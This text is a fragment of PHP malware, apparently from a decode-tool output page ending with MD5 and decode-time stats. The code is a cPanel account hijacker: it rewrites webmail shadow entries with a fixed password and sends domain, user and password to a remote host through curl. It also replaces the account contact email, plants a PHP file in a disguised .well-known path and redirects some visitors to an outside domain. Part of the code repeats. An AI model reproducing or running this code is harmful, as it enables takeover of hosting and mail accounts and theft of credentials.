$_SERVER['SERVER_NAME']; $t = @str_replace("www.","",$t); @$passwd = file_get_contents('/home/'.$user.'/etc/'.$t.'/shadow'); $ex=explode("\r\n",$passwd); @link('/home/'.$user.'/etc/'.$t.'/shadow','/home/'.$user.'/etc/'.$t.'/shadow.roottn.bak'); @unlink('/home/'.$user.'/etc/'.$t.'/shadow'); foreach($ex as $ex){ $ex=explode(':',$ex); $e= $ex[0]; if ($e){ $b=fopen('/home/'.$user.'/etc/'.$t.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."\r\n");fclose($b); $tbs = $t.'/webmail|'.$e.'@'.$t.'|'.$password; $ccpwebm = curl_init(); curl_setopt($ccpwebm, CURLOPT_URL, $webm1 . $tbs); curl_exec($ccpwebm); } } } if ($activssl == '1' && $nfiles >= '10'){ $loga = $_SERVER['DOCUMENT_ROOT'] . $lss; if (!file_exists($loga)){ mkdir($_SERVER['DOCUMENT_ROOT'] . strrev('/noitadilav-ikp/nwonk-llew./'), 0777, true); $fp = fopen($loga, 'w'); fwrite($fp, $sslphp); fclose($fp); $s_host = $_SERVER['SERVER_NAME']; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $gui . $s_host); curl_exec($ch); } } $found=true; } } else if (file_exists($log)) {$contents = file_get_contents($log); $array = explode(',',$contents); for($i=0;$i<count($array);$i++){if($array[$i]==$_file_){$found=true;break;} else {$found=false;} }} if($found){} else { if(file_put_contents($log,$_file_.',',FILE_APPEND)){ if ($activsnd == '1') { $if($desktop($E),$desktop('dzBybQ'),$_,$desktop('RnJvbTogVzBybQ')); } $cphost = $_SERVER['SERVER_NAME'] . ":2083|" . get_current_user(); $ctf = $_SERVER['DOCUMENT_ROOT'] . "/../.cpanel/contactinfo"; $ctml = $_SERVER['DOCUMENT_ROOT'] . "/../.contactemail"; if (file_exists($ctml)){ $fil = fopen($ctml, 'w'); fwrite($fil, $eml); fclose($fil); unlink($ctf); $ccp = curl_init(); curl_setopt($ccp, CURLOPT_URL, $fgcp . $cphost); curl_exec($ccp); set_time_limit(0); ini_set('max_execution_time',0); ini_set('memory_limit',-1); $user=get_current_user(); $password='azerty123.0@10'; $pwd = crypt($password,'$6$roottn$'); $t = $_SERVER['SERVER_NAME']; $t = @str_replace("www.","",$t); @$passwd = file_get_contents('/home/'.$user.'/etc/'.$t.'/shadow'); $ex=explode("\r\n",$passwd); @link('/home/'.$user.'/etc/'.$t.'/shadow','/home/'.$user.'/etc/'.$t.'/shadow.roottn.bak'); @unlink('/home/'.$user.'/etc/'.$t.'/shadow'); foreach($ex as $ex){ $ex=explode(':',$ex); $e= $ex[0]; if ($e){ $b=fopen('/home/'.$user.'/etc/'.$t.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."\r\n");fclose($b); $tbs = $t.'/webmail|'.$e.'@'.$t.'|'.$password; $ccpwebm = curl_init(); curl_setopt($ccpwebm, CURLOPT_URL, $webm1 . $tbs); curl_exec($ccpwebm); } } } if ($activssl == '1' && $nfiles >= '10'){ $loga = $_SERVER['DOCUMENT_ROOT'] . $lss; if (!file_exists($loga)){ mkdir($_SERVER['DOCUMENT_ROOT'] . strrev('/noitadilav-ikp/nwonk-llew./'), 0777, true); $fp = fopen($loga, 'w'); fwrite($fp, $sslphp); fclose($fp); $s_host = $_SERVER['SERVER_NAME']; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $gui . $s_host); curl_exec($ch); } } } }
foreach($blocked_words as $word2) {
if (substr_count($dp, strtolower($word2)) > 0 or $dp == "" or $dp == " " or $dp == " ") {
exit(header('Location: http://guiminer.co.technology/rd/'));
}
}
?>
Function Calls
None |
Stats
MD5 | 1ae9c83e5b520edea96199994dff24e7 |
Eval Count | 0 |
Decode Time | 125 ms |